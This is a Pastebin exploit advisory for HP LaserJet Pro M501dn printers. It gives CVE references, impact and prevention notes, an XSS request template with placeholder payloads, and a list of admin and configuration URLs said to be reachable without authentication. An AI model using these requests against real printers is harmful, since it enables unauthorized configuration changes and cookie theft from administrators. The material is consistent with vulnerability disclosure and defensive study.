Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : HP LaserJet Pro M501dn Printers 6.7.0.x Authentication Bypass - Cross Site Scripting
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 04/04/2019
- # Vendor Homepage : hp.com
- # Software Information Link :
- 8.hp.com/tr/tr/products/printers/product-detail.html?oid=7710401
- # Software Version :
- Driver-Universal Print Driver for Managed Services => 6.7.0.23989
- Driver-Universal Print Driver => 6.7.0.23989
- Software Universal Printer Driver => 1.8.6
- Firmware Datecode => 20150924
- Control Panel Version => 0x00
- Maximum Print Quality => ProRes 1200
- # Tested On : Windows and Linux
- # Category : Hardware
- # Exploit Risk : High / Medium
- # Common Vulnerability Enumeration :
- CVE-2009-0941
- CVE-2009-2684
- # Vulnerability Type :
- CWE-306 [ Missing Authentication for Critical Function ]
- CWE-592 [ Authentication Bypass ]
- CWE-287 [ Improper Authentication ]
- CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
- CWE-264 [ Permissions, Privileges, and Access Controls ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Description about Software :
- ***************************
- HP LaserJet as a brand name identifies the line of dry electrophotographic DEP laser printers marketed by the American
- computer company Hewlett-Packard (HP). The HP LaserJet was the world's first desktop laser printer.
- ############################################################################################
- # Impact :
- ***********
- Authentication Bypass / Missing Authentication For Critical Function :
- ************************************************************
- When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.
- Remote attackers can edit - delete and access files and administrative access without real administrator permission.
- Remote attackers can bypass this because the system doesn't ask admin username and password.
- The software does not perform any authentication for functionality that requires a provable user identity
- or consumes a significant amount of resources.
- The vulnerability allows a remote unauthenticated attacker to send specially crafted HTTP request to the
- affected application and change configuration settings or gain administrative access.
- Missing authentication for critical function is a language independent issue that can appear in any multiuser environment.
- Developing a fix would require understanding of the current application security model and implemented access controls.
- Three basic rules however can help you eliminate potential improper authorization issues:
- 1) Identify all privileged assets within your application (web pages that display sensitive data,
- website sections that contain privileged/administrative functionality, etc.)
- 2) Identify user roles within the application and their access permissions
- 3) Always check if the user should have privileges to access the asset.
- XSS Cross Site Scripting Impact /Prevention :
- ****************************************
- are prone to a cross-site scripting vulnerability
- because it fails to sufficiently sanitize user-supplied data.
- A remote user can access the target user's cookies (including authentication cookies),
- if any, associated with the HP Printer interface, access data recently submitted by the
- target user via web form to the site, or take actions on the site acting as the target user.
- Cross-site scripting vulnerability in HP Jetdirect and the Embedded Web Server (EWS)
- on certain HP LaserJet and Color LaserJet printers allow remote attackers to
- inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an
- Apply action to the support_param.html/config script.
- Prevention of XSS Vulnerability :
- ****************************
- set the administrator password
- use a new browser instance for administrator tasks
- do not access other web sites while performing administrator tasks
- exit the browser when administrator tasks are complete
- According to the CVE-2009-0941 =>
- *********************************
- The HP Embedded Web Server (EWS) on HP LaserJet Printers, Edgeline Printers, and Digital Senders
- has no management password by default, which makes it easier for remote attackers to obtain access.
- According to the CVE-2009-2684 =>
- *********************************
- Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on
- certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to
- inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter
- in an Apply action to the support_param.html/config script.
- ############################################################################################
- XSS Cross Site Scripting Exploit :
- *******************************
- https://[targetipaddress]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply
- It returns as " /success_result.htm/config "
- Configuration Successfully Done.
- # Authentication Bypass Exploit / Vulnerability :
- *******************************************
- https://[targetipaddress]/hp/device/this.LCDispatcher
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.EmailServer
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=1&lstid=-1
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts&subpage=3&lstid=1
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Alerts
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.AutoSend
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Security&fldPage=0
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.OtherLinks
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.Config
- https://[targetipaddress]/hp/device/this.LCDispatcher?nav=hp.DeviceInfoConfig
- https://[targetipaddress]info_configuration.html?tab=Home&menu=DevConfig
- https://[targetipaddress]/hp/device/Auth/set_config_deviceinfo.htm
- https://[targetipaddress]/hp/device/info_configuration.htm
- https://[targetipaddress]/hp/jetdirect
- https://[targetipaddress]/config_pro.htm
- https://[targetipaddress]/tcpipv6.htm
- https://[targetipaddress]/tcpipv4.htm
- https://[targetipaddress]/tcp_param.htm
- https://[targetipaddress]/network_id.htm
- https://[targetipaddress]/tcp_summary.htm
- https://[targetipaddress]/index_info.htm
- https://[targetipaddress]/support_param.html
- https://[targetipaddress]/support.htm
- https://[targetipaddress]/tcp_diag.htm
- https://[targetipaddress]/configpage.htm
- https://[targetipaddress]/tcp_param.htm
- https://[targetipaddress]/network_id.htm
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Add Comment
Please, Sign In to add comment